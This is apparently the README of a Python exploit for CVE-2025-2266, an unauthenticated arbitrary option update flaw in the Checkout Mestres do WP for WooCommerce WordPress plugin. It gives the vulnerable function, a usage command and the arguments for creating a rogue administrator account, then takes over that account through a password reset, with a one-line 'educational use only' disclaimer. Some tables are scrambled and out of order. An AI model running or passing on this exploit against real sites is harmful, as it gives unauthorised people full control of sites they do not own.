Checkout Mestres do WP for WooCommerce WordPress 插件在 8.6.5 至 8.7.5 版本中存在 未经身份验证的任意选项更新漏洞。
有漏洞的函数 cwmpUpdateOptions() 缺少适当的能力检查,允许 未经验证的攻击者 更新任意 WordPress 选项。
攻击者可:
administratorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H此 Python 脚本利用该漏洞以:
administrator 设为默认角色requests 模块(通过 pip install requests 安装)8.6.5 – 8.7.5)脚本通过以下路径检查插件版本:
/wp-content/plugins/checkout-mestres-wp/readme.txt
如果插件存在漏洞:
注册一个具有管理员权限的新用户(默认:nxploited)
python CVE-2025-2266.py -u http://target.com/wordpress -newuser adminx -email [email protected]
| 选项 | 描述 |
|---|---|
-u, --url | 目标 WordPress 站点 URL(必填) |
usage: CVE-2025-2266.py [-h] -u URL [-newuser [NEWUSER]] [-email [EMAIL]]
CVE-2025-2266 Checkout Mestres do WP for WooCommerce Plugin Exploit
By : Nxploited | Khaled Alenazi
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL (e.g., http://example.com/wordpress)
-newuser [NEWUSER] Create new admin user (default username: nxploited)
-email [EMAIL] Email for new user (default: [email protected])
用户创建后:
访问登录页面:
http://target.com/wordpress/wp-login.php
点击 “丢失密码?”
[email protected])设置密码并获取完全管理员权限 🎯
漏洞利用由 Nxploited | Khaled Alenazi 提供
⚠️ 此脚本仅用于教育和授权测试目的。
-newuser |
创建新的管理员用户(默认用户名:nxploited) |
-email | 新用户的邮箱(默认:[email protected]) |